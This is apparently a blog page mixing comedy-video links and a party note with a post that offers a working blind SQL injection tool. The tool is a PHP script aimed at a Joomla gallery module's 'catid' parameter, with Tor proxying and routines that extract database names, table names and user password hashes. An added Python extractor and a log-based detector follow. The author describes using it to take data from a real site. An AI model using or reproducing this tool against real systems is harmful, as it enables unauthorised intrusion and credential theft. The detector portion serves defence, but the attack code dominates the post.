A goodbye party, since some of us are leaving very soon (some are leaving as early as tomorrow). This must be the first time I make an appearance on YouTube; I usually don’t like it, but this was an exception since I really enjoyed myself. These guys are great fun ^_^

Part 1

Part 2

This was actually the first place I saw Danny Bhoy; I didn’t think about posting this before, though.

Scottish Breakfast

http://comedians.jokes.com/danny-bhoy/videos/danny-bhoy—scottish-breakfast

Worst diet in the world

http://comedians.jokes.com/danny-bhoy/videos/danny-bhoy—worst-diet-in-the-world

Half-Scottish, Half-Indian

http://comedians.jokes.com/danny-bhoy/videos/danny-bhoy—half-scottish–half-indian

Danny Bhoy – Alcohol Reminiscence

http://comedians.jokes.com/danny-bhoy/videos/danny-bhoy—alcohol-reminiscence

Found some more from Danny Bhoy, hilarious :)

Part 1

Part 2

http://www.youtube.com/watch?v=z3Zk6xHIdMA

Part 3

http://www.youtube.com/watch?v=LLTeX4zVa_E

Part 4

http://www.youtube.com/watch?v=-u960xWA57k

Part 5

http://www.youtube.com/watch?v=Nq-y3j0i-t8

Part 6

http://www.youtube.com/watch?v=zm2DOTSTZj4

Part 7

http://www.youtube.com/watch?v=PNhiboU7tOA

Part 8

http://www.youtube.com/watch?v=jsU8VLa_3Bk

Blind SQLi tool in PHP


I originally made this for a blind SQL injection vulnerability that I found in a Joomla module called “xeyougallery”, although I later discovered that someone else had found it before me and published a small example of it (http://packetstorm.arabianits.com/0912-exploits/joomlaxeyou-sql.txt). No exploit had been published for it, though, so I decided to write my own, since I wanted some data out of a database on a site that used that specific module.

After a while I decided to make a “general” tool that lets me extract data through a blind SQL injection vulnerability. It is boolean-based: every request appends a condition to the vulnerable parameter, and the tool decides whether that condition was true by checking whether a configured marker string (_TRUE_) appears in the response. Lengths are found by asking LENGTH(...)=0, 1, 2, ... and strings are recovered one character at a time by trying every character of the configured charset at each position, so each character costs up to as many requests as the charset has entries. I didn’t finish this code; there’s some debug info still left in there as well as a “todo” list. I didn’t finish it because I recently started learning Perl and decided to rewrite the tool in Perl later, so I’ll finish it then instead. This code can still be used “as is” to extract table names and some user information.
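How the extraction works, as an added example that is not the tool from this post: a small Python script with a deliberately vulnerable page backed by a constructed in-memory SQLite database, the yes/no oracle that the marker string gives an attacker, and an extractor that bisects on the character code (UNICODE(SUBSTR(...)), SQLite's spelling of MySQL's ORD(SUBSTR(...))) instead of trying every character of a charset in turn, which brings the cost per character down from up to about ninety requests to eight. The table and column names, the marker “Word”, the sample data and the SQLite dialect (sqlite_master instead of information_schema.tables) are assumptions for the demo. The hardened version of the same page is included to show the oracle disappearing once the parameter is validated and bound.

```python
"""Boolean-based blind SQL injection, end to end: a deliberately vulnerable page,
the yes/no oracle it leaks, and an extractor that bisects on the character code
instead of scanning a charset linearly.

Added example, not the PHP tool from the post. The target is a constructed
in-memory SQLite database standing in for the Joomla/MySQL site, so the payloads
use SQLite's sqlite_master and UNICODE() where the tool uses
information_schema.tables and ORD(); the oracle and the logic are the same."""
import sqlite3

TRUE_MARKER = "Word"   # text the page shows only when the injected condition holds


def make_db():
    """Constructed sample data; table names, user and hash are made up."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE jos_users(id INTEGER, username TEXT, password TEXT);
        CREATE TABLE jos_xeyougallery(catid INTEGER, title TEXT);
        INSERT INTO jos_users VALUES (62, 'admin', 'constructed-hash');
        INSERT INTO jos_xeyougallery VALUES (1, 'Word of the day'), (2, 'Other');
    """)
    return db


def render(rows):
    return "<h1>Gallery</h1>" + "".join(f"<li>{title}</li>" for (title,) in rows)


def vulnerable_page(db, catid):
    """Vulnerable: the request parameter is glued into the SQL, like the module's catid."""
    sql = "SELECT title FROM jos_xeyougallery WHERE catid=" + catid + " ORDER BY title"
    return render(db.execute(sql).fetchall())


def hardened_page(db, catid):
    """Fixed: the parameter is validated as an integer and bound; no SQL is reachable."""
    try:
        cid = int(catid)
    except ValueError:
        return render([])
    sql = "SELECT title FROM jos_xeyougallery WHERE catid=? ORDER BY title"
    return render(db.execute(sql, (cid,)).fetchall())


class BlindExtractor:
    """Recovers values through a page that only answers yes or no."""

    def __init__(self, page):
        self.page = page        # callable taking the catid value and returning HTML
        self.requests = 0

    def ask(self, condition):
        """One oracle query: inject AND (condition), comment out the rest, look for the marker."""
        self.requests += 1
        return TRUE_MARKER in self.page(f"1 AND ({condition})--")

    def number(self, expr, maximum):
        """Value of the integer expression expr, by bisection over [0, maximum]:
        the smallest v for which 'expr > v' is false (0 if the oracle never answers yes)."""
        lo, hi = 0, maximum
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(f"({expr}) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def string(self, expr, max_len=100):
        """LENGTH first, then each character's code point (8 requests per character,
        against up to ~90 for a linear scan of the tool's charset). Code points <= 255 assumed."""
        length = self.number(f"LENGTH(({expr}))", max_len)
        return "".join(
            chr(self.number(f"UNICODE(SUBSTR(({expr}),{pos},1))", 255))
            for pos in range(1, length + 1)
        )


def dump(page):
    """What the tool does: count the tables, name them, read a credential."""
    ex = BlindExtractor(page)
    n = ex.number("SELECT COUNT(*) FROM sqlite_master WHERE type='table'", 1000)
    tables = [
        ex.string(f"SELECT name FROM sqlite_master WHERE type='table' ORDER BY name LIMIT 1 OFFSET {i}")
        for i in range(n)
    ]
    secret = ex.string("SELECT password FROM jos_users WHERE username='admin'")
    return tables, secret, ex.requests


if __name__ == "__main__":
    db = make_db()
    print(dump(lambda c: vulnerable_page(db, c)))   # both table names, the hash, a few hundred requests
    print(dump(lambda c: hardened_page(db, c)))     # ([], '', 17): the oracle is gone
```

Against a real target, ask() becomes the HTTP request and the marker check is the same test the PHP tool's tryConnect() does; nothing else changes. The request counter is the point of the bisection: two table names and a sixteen-character value come out in a few hundred requests, where a linear charset scan can spend ninety per character, and the hardened page answers “no” to everything, so the extractor returns nothing after the seventeen requests it takes to conclude that.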

Current features

* Extract version
* Extract database name
* Extract username and password
* Extract table names

Download

[blind-sqli-1-7.tar.gz]


<?php
/****************************************/
/*            Blind SQLi tool v1.7      */
/*                By: cats              */
/****************************************/

/*
Check if curl is activated/installed
*/
if(!function_exists("curl_init"))
    die("cURL extension is not installed\n");

/**************************************/
/*           Configuration            */
/**************************************/

/*
Host plus path to the vulnerable variable
Example: http://example.com/joomla/index.php?option=com_xeyougallery&Itemid=0&func=viewcategory&catid=1

Where "catid" is the vulnerable one. Every payload is appended directly to
this string, so it must end with the injectable (numeric, unquoted) parameter.
*/
define('_HOST_PATH_', 'http://www.example.com/index.php?option=com_xeyougallery&Itemid=0&func=viewcategory&catid=1');

/*
A string that is visible on the page when the statement in the injection is true
and absent when it is false. Take it from the real result (a gallery title, say),
not from the page template.
*/
define('_TRUE_', 'Word');

/*
Proxy settings
(Defaults to polipo/tor)
*/
define('_PROXY_ENABLED_', '1');
define('_PROXY_ADDRESS_', '127.0.0.1');
define('_PROXY_PORT_', '8123');

/*
Timeout per request in seconds, so a hanging request cannot stall the tool
*/
define('_TIMEOUT_', '30');

/*
Charset, tried in this order at every character position.
Lower case is tried before upper case, so if the target's collation makes the
comparison case-insensitive, upper-case letters come back as lower case; in that
case compare with BINARY substr(...) or ORD(substr(...)) instead.
Note: the non-ASCII character is two bytes in a UTF-8 source file and is tried
as two separate bytes.
*/
define('_CHARS_', 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.@-_0123456789$*:;+?()~{}[]^%&/\\#"\'|½><');

/*What functions to use*/

/*Extract table names*/
define('_EXTRACT_TABLES_', '1');

/*Extract version number of database*/
define('_FIND_VERSION_', '1');

/*Extract username and password of current database user*/
define('_EXTRACT_USER_', '1');

/*Extract database name*/
define('_EXTRACT_DATABASE_', '1');

/*Check if host is vulnerable at all (recommended)*/
define('_CHECK_VULNERABLE_', '1');

/*
Table number to continue extracting from.
In case you have to stop in the middle
*/
define('_START_ROW_', '0');

/*
Max number of tables to check for
*/
define('_MAX_TABLES_', '1000');

/*
Max length of version to look for
*/
define('_MAX_VERSION_', '100');

/*
Max length of database name to look for
*/
define('_MAX_DATABASE_', '100');

/*
Max length of username to look for
*/
define('_MAX_USERNAME_', '100');

/*
Max length of password to look for
*/
define('_MAX_PASSWORD_', '300');

/**************************************/
/*            Functions               */
/**************************************/

// Every request asks the database one yes/no question: the condition goes into
// an if(...) that yields 1 (the page shows _TRUE_) or 2 (it does not).
// Spaces are written as the empty comment /**/ so nothing needs URL encoding.

/*
Find the value of the integer expression $expr by asking $expr=0, 1, 2, ...
Returns 0 if nothing below $max matched (one request per candidate).
*/
function blindNumber($expr, $max)
{
    for($i = 0; $i < $max; ++$i)
    {
        $completePath = _HOST_PATH_ . '/**/AND/**/1=(if((' . $expr . ')=' . $i . ',1,2))/**/--';

        if(tryConnect($completePath))
            return $i;
    }

    return 0;
}

/*
Find the length of the string expression $expr the same way.
*/
function blindLength($expr, $max)
{
    return blindNumber('SELECT/**/LENGTH(' . $expr . ')', $max);
}

/*
Recover $length characters of $expr, trying every byte of _CHARS_ at every
position (one request per attempt). Stops at the first position where nothing
matches and returns what was recovered so far.
*/
function blindString($expr, $length)
{
    $chars = _CHARS_;
    $word  = '';

    for($i = 1; $i <= $length; ++$i)
    {
        $found = false;

        for($j = 0; $j < strlen($chars); ++$j)
        {
            $completePath = _HOST_PATH_ . '/**/AND/**/1=(if((SELECT/**/substr(' . $expr . ',' . $i . ',1))=0x' . sprintf('%02x', ord($chars[$j])) . ',/**/1,/**/2))/**/--';

            if(tryConnect($completePath))
            {
                $word .= $chars[$j];
                $found = true;
                break;
            }
        }

        if(!$found)
            break;
    }

    return $word;
}

/*
Find the length of $expr, then brute force it. Prints progress under $name
and returns the recovered string (empty if nothing could be recovered).
*/
function extractValue($name, $expr, $max)
{
    $length = blindLength($expr, $max);

    if($length == 0)
    {
        echo "[-] Unable to determine length of $name\n";
        return '';
    }

    echo "[+] Length of $name: $length\n";

    $word = blindString($expr, $length);

    if(strlen($word) == $length)
        echo "[+] Found $name: $word\n\n";
    else
    {
        if(strlen($word) > 0)
            echo "[+] Part of $name extracted: $word\n";
        echo "[-] $name could not be determined\n\n";
    }

    return $word;
}

function extractTableNames()
{
    echo "-=Attempting to dump table names\n";

    /*Get number of tables (every schema the database user can see)*/
    $numTables = blindNumber('SELECT/**/count(table_name)/**/FROM/**/information_schema.tables', _MAX_TABLES_);

    if($numTables > 0)
    {
        echo "[+] Number of tables: $numTables\n\n";

        /*Extract table names one row at a time, by brute force*/
        for($n = _START_ROW_; $n < $numTables; ++$n)
        {
            $expr = '(SELECT/**/table_name/**/FROM/**/information_schema.tables/**/LIMIT/**/' . $n . ',1)';
            extractValue("table name on row $n", $expr, 100);
        }
    }
    else
        echo "[-] Unable to determine number of tables\n";

    echo "\n\n";
}

function checkVersion()
{
    echo "-=Attempting to find database version\n";

    extractValue('version', 'version()', _MAX_VERSION_);
}

function checkDatabase()
{
    echo "-=Attempting to find database name\n";

    extractValue('database name', 'database()', _MAX_DATABASE_);
}

function checkUser()
{
    echo "-=Attempting to find username and password of the current database user\n";

    $user = extractValue('username', 'user()', _MAX_USERNAME_);

    /*
    The hash is read from mysql.user, which needs SELECT privilege on the mysql
    database (a web application's account usually does not have it).
    On MySQL 5.7 and later the column is authentication_string, not password.
    */
    $pass = extractValue('password', '(SELECT/**/password/**/FROM/**/mysql.user/**/WHERE/**/user/**/=/**/SUBSTRING_INDEX(user(),0x40,1)/**/LIMIT/**/1)', _MAX_PASSWORD_);

    if(strlen($user) > 0 || strlen($pass) > 0)
        echo "[+] User/Pass: $user - $pass\n\n";
}

function checkVulnerable()
{
    echo "-=Checking if target is vulnerable\n";

    /*A true condition must show the marker and a false one must hide it*/
    $trueShown  = tryConnect(_HOST_PATH_ . '/**/AND/**/1=1/**/--');
    $falseShown = tryConnect(_HOST_PATH_ . '/**/AND/**/1=2/**/--');

    if($trueShown && !$falseShown)
        echo "[+] Target seems to be vulnerable\n\n";
    else
        die("[-] Target does not seem to be vulnerable, exiting\n\n");
}

/*
Fetch $URL (through the proxy if enabled) and return true if the _TRUE_ marker
is in the response, false otherwise (also when the request itself fails).
*/
function tryConnect($URL)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_URL, $URL);
    curl_setopt($ch, CURLOPT_TIMEOUT, (int) _TIMEOUT_);

    if(_PROXY_ENABLED_)
        curl_setopt($ch, CURLOPT_PROXY, (_PROXY_ADDRESS_ . ':' . _PROXY_PORT_));

    $r = curl_exec($ch);
    curl_close($ch);

    /*curl_exec() returns false on a failed request; treat that as "false"*/
    if($r !== false && stristr($r, _TRUE_) !== false)
        return true;
    return false;
}

/**************************************/
/*            Execution               */
/**************************************/

echo "************************\n" .
     "**Blind SQLi tool v1.7**\n" .
     "********By cats*********\n" .
     "************************\n\n";

if(_CHECK_VULNERABLE_)
    checkVulnerable();

if(_EXTRACT_USER_)
    checkUser();

if(_EXTRACT_DATABASE_)
    checkDatabase();

if(_FIND_VERSION_)
    checkVersion();

if(_EXTRACT_TABLES_)
    extractTableNames();

echo "[+] Finished\n";

?>
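Seen from the other side of the wire, the tool above leaves a very recognisable trail in the web server's access log: empty comments instead of spaces, an if(...) oracle, information_schema and mysql.user lookups, a trailing comment terminator, and a long run of requests from one address that differ only in a number. The following is an added example, not part of this post: it parses constructed Apache-style log lines that mimic the tool's requests, scores each request against those payload features and groups the hits by client address. The log format, the indicator patterns and the threshold are assumptions to be tuned for a real site.

```python
"""What the tool above looks like from the web server's side.

Added example, not part of the post. The log lines are constructed
Apache-combined-style entries mimicking the requests the tool sends; the
indicator patterns, the log format and the threshold are assumptions."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample: one ordinary visitor (198.51.100.7) and one extractor run (203.0.113.5).
BASE = "/index.php?option=com_xeyougallery&Itemid=0&func=viewcategory&catid="
SAMPLE_LOG = "\n".join([
    f'198.51.100.7 - - [12/Dec/2009:10:00:01 +0100] "GET {BASE}1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'203.0.113.5 - - [12/Dec/2009:10:00:02 +0100] "GET {BASE}1/**/AND/**/1=1/**/-- HTTP/1.1" 200 5120 "-" "curl/7.19"',
    f'203.0.113.5 - - [12/Dec/2009:10:00:02 +0100] "GET {BASE}1/**/AND/**/1=2/**/-- HTTP/1.1" 200 4100 "-" "curl/7.19"',
    f'203.0.113.5 - - [12/Dec/2009:10:00:03 +0100] "GET {BASE}1/**/AND/**/1=(if((SELECT/**/LENGTH((SELECT/**/version())))=5,1,2))/**/-- HTTP/1.1" 200 4100 "-" "curl/7.19"',
    f'203.0.113.5 - - [12/Dec/2009:10:00:03 +0100] "GET {BASE}1/**/AND/**/1=(if((SELECT/**/LENGTH((SELECT/**/version())))=6,1,2))/**/-- HTTP/1.1" 200 5120 "-" "curl/7.19"',
    f'203.0.113.5 - - [12/Dec/2009:10:00:04 +0100] "GET {BASE}1/**/AND/**/1=(if((SELECT/**/substr((SELECT/**/version()),1,1))=0x35,/**/1,/**/2))/**/-- HTTP/1.1" 200 5120 "-" "curl/7.19"',
    f'203.0.113.5 - - [12/Dec/2009:10:00:04 +0100] "GET {BASE}1/**/AND/**/1=(if((SELECT/**/count(table_name)/**/FROM/**/information_schema.tables)=40,1,2))/**/-- HTTP/1.1" 200 4100 "-" "curl/7.19"',
    f'198.51.100.7 - - [12/Dec/2009:10:00:05 +0100] "GET {BASE}2 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"',
])

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)'
)

# Payload features of a boolean-based blind MySQL injection like the tool's.
INDICATORS = {
    "comment_as_whitespace": re.compile(r"/\*\*/"),
    "conditional_oracle":    re.compile(r"\bif\s*\(|\bcase\s+when\b", re.I),
    "information_schema":    re.compile(r"\binformation_schema\b", re.I),
    "mysql_user_table":      re.compile(r"\bmysql\.user\b", re.I),
    "char_compare_hex":      re.compile(r"\bsubstr(?:ing)?\s*\(.*?=\s*0x[0-9a-f]{2,}", re.I | re.S),
    "comment_terminator":    re.compile(r"(?:--|#)\s*$"),
}


def indicators(url):
    """Names of the indicators present in the query string of one request."""
    if "?" not in url:
        return []
    raw = unquote_plus(url.split("?", 1)[1])
    flat = raw.replace("/**/", " ")     # the tool writes every space as an empty comment
    return [name for name, rx in INDICATORS.items()
            if rx.search(raw if name == "comment_as_whitespace" else flat)]


def analyze(log_text, min_hits=3):
    """Group flagged requests by client address. A blind extractor sends many requests
    that differ only in a number, so distinct request 'shapes' (digits masked) are
    counted too. Returns a report for every address with at least min_hits hits."""
    per_ip = defaultdict(lambda: {"requests": 0, "hits": 0, "indicators": set(), "shapes": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = per_ip[m["ip"]]
        rec["requests"] += 1
        found = indicators(m["url"])
        if found:
            rec["hits"] += 1
            rec["indicators"].update(found)
            rec["shapes"].add(re.sub(r"\d+", "#", m["url"]))
    return {
        ip: {"requests": r["requests"], "hits": r["hits"],
             "shapes": len(r["shapes"]), "indicators": sorted(r["indicators"])}
        for ip, r in per_ip.items() if r["hits"] >= min_hits
    }


if __name__ == "__main__":
    for ip, rec in analyze(SAMPLE_LOG).items():
        print(ip, rec)
```

On the sample, the visitor never scores and the extractor's address is reported with six hits across only four request shapes, which is the signature to alert on: many requests, few shapes, digits changing between them. The two response sizes in the sample (5120 for a true condition, 4100 for a false one) are the other tell; a blind extractor produces a strictly bimodal response size from one client, which is cheap to check once the address has been flagged.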

A Scottish stand-up comedian.

I found him at random at http://www.comedycentral.com.

He’s really good!

Part 1

Part 2

http://www.youtube.com/watch?v=RoUAJrJsjAU

Part 3

http://www.youtube.com/watch?v=faYqcGg5jMo

Part 4

http://www.youtube.com/watch?v=GFwzap7Gn3s

Part 5

http://www.youtube.com/watch?v=XtB5VJCjsp0

Part 6

http://www.youtube.com/watch?v=kdhxzYZbkaE

Part 7

http://www.youtube.com/watch?v=g5Lg_0RNfX8

Part 8

http://www.youtube.com/watch?v=nYKQCNiXW_4